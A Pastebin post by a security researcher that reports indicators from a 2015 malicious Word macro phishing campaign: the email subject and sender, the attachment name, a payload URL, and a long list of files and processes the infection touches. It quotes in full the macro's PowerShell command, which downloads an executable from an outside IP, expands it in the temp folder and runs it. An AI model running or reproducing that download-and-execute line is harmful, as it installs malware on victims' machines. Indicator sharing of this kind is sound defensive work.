API tools faq
paste
Advertisement
Neonprimetime

Word VBA Macro: 185.39.149.21 again

Neonprimetime
Mar 31st, 2015
412
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.94 KB | None | 0 0
raw download clone embed print report
  1. Microsoft Word VBA Macro
  2. Reported by neonprimetime security
  3. http://neonprimetime.blogspot.com
  4.  
  5. *****
  6. Blog about this: http://neonprimetime.blogspot.com/2015/03/talking-thru-some-malware-in-microsoft.html
  7. *****
  8. Malicious Email:
  9. Subject: 13491-Your Latest Documents from RS Components 595540552
  10. From: [email protected]
  11. ****
  12. G-A9064803940323690616417-1.doc
  13.  
  14. hxxp://185.39.149.21/jsaxo8u/g39b2cx.exe
  15.  
  16. cmd /K powershell.exe -ExecutionPolicy bypass -noprofile (New-Object System.Net.WebClient).DownloadFile('http://185.39.149.21/jsaxo8u/g39b2cx.exe','%TEMP%\4543543.cab'); expand %TEMP%\4543543.cab %TEMP%\4543543.exe; start %TEMP%\4543543.exe;
  17. ****
  18.  
  19. Files or Processes touched or involved:
  20.  
  21. C:\Documents and Settings\admin\Application Data\Microsoft\Office\Word11.pip
  22. C:\Documents and Settings\admin\Application Data\Microsoft\Templates\~$Normal.dot
  23. C:\Documents and Settings\admin\Local Settings\Temp\~$A9064803940323690616417-1-1.doc
  24. C:\Documents and Settings\admin\Local Settings\Temp\~WRF0000.tmp
  25. C:\Documents and Settings\admin\Local Settings\Temp\4543543.exe
  26. C:\Documents and Settings\admin\Local Settings\Temporary Internet Files\Content.Word\~WRS0001.tmp
  27. C:\Documents and Settings\admin\My Documents
  28. C:\Program Files\Adobe\Reader 10.0\Reader\AcroRd32.exe
  29. C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe
  30. C:\Program Files\Adobe\Reader 9.0\Reader\AcroRd32.exe
  31. C:\Program Files\Microsoft Office\Office12\WINWORD.EXE
  32. C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
  33. C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
  34. C:\Program Files\Microsoft Office\Office15\WINWORD.EXE
  35. C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRC0000.tmp
  36. C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{5B4CA3B6-3252-446E-81B1-05ED1EC4A9D4}.tmp
  37. C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{77DADE07-13FE-49C3-8F4D-71FDEEE403CA}.tmp
  38. C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{0636F7A0-A653-4482-9EC1-C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{0636F7A0-A653-4482-9EC1-C6DB4134DCC9}.tmp
  39. C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{08CE52A0-0BAD-40CC-8402-BF2776E8E6F2}.tmp
  40. C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{AA4D6119-0C70-4589-893F-C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
  41. C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{C3E7D6AC-1C7D-4F5A-AF77-CE2F030680CB}.tmp
  42. C:\Users\admin\AppData\Local\Temp\~$A9064803940323690616417-1-1.doc
  43. C:\Users\admin\AppData\Local\Temp\~$A9064803940323690616417-1-2.doc
  44. C:\Users\admin\AppData\Local\Temp\4543543.exe
  45. C:\Users\admin\AppData\Local\Temp\CVR6BFB.tmp.cvr
  46. C:\Users\admin\AppData\Roaming\Microsoft\Office\Word12.pip
  47. C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
  48. C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies
  49. C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
  50. C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF3ec03.TMP
  51. C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\LA6HPGST75M2ECSZRTCW.temp
  52. C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\PTHH5NRSX7703I1BOZAW.temp
  53. C:\Users\Administrator\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{DE81A7E2-45B5-49B8-8E58-1C96F8F3ABF3}.tmp
  54. C:\Users\Administrator\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{64FFCFE6-6707-40DF-A0AA-E4A1ADA37256}.tmp
  55. C:\Users\Administrator\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{71A28C78-2F9A-41AD-9DDE-7ED087830983}.tmp
  56. C:\Users\Administrator\AppData\Local\Temp\~$A9064803940323690616417-1.doc
  57. C:\Users\Administrator\AppData\Local\Temp\4543543.cab
  58. C:\Users\Administrator\AppData\Local\Temp\CVRD7D7.tmp.cvr
  59. C:\Users\Administrator\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
  60. C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
  61. C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\7HPSG0NCKZT9C3A8OLS8.temp
  62. C:\WINDOWS\assembly\NativeImages_v2.0.50727_32\System\36dbfcf62e07d819b3de533898868ecf\System.ni.dll
  63. C:\Windows\explorer.exe
  64. C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll
  65. C:\Windows\System32\cmd.exe
  66. C:\Windows\System32\expand.exe
  67. C:\WINDOWS\system32\expand.exe C:\DOCUME~1\admin\LOCALS~1\Temp\4543543.cab C:\DOCUME~1\admin\LOCALS~1\Temp\4543543.exe
  68. C:\Windows\system32\expand.exe C:\Users\ADMINI~1\AppData\Local\Temp\4543543.cab C:\Users\ADMINI~1\AppData\Local\Temp\4543543.exe
  69. C:\Windows\System32\taskhost.exe
  70. C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!